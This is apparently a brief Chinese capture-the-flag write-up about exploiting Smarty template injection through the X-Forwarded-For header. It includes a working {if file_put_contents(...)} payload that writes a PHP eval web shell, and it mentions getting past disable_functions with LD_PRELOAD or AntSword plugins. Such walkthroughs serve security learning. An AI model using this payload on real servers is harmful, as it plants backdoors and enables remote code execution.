根据题目和页面内容 提示,可以知道这里使用的是PHP中的Smarty模板
网上看这个模板存在着模板注入,但是没有找到参数,猜测在请求头
那就有两种可能的注入点:
- XFF
- client IP
发现XFF存在注入
测试phpinfo()发现这里禁用了很多函数,并且可访目录也做了限制
使用{if}
标签写入一句话木马
{if file_put_contents('/var/www/html/shell.php','<?php eval($_POST[cmd]);')}{/if}
连接蚁剑
进入之后发现无法访问其他目录,也没法执行命令
看师傅们都是用的无需sendmail:巧用LD_PRELOAD突破disable_functions
本人菜逼,使用的是蚁剑中的插件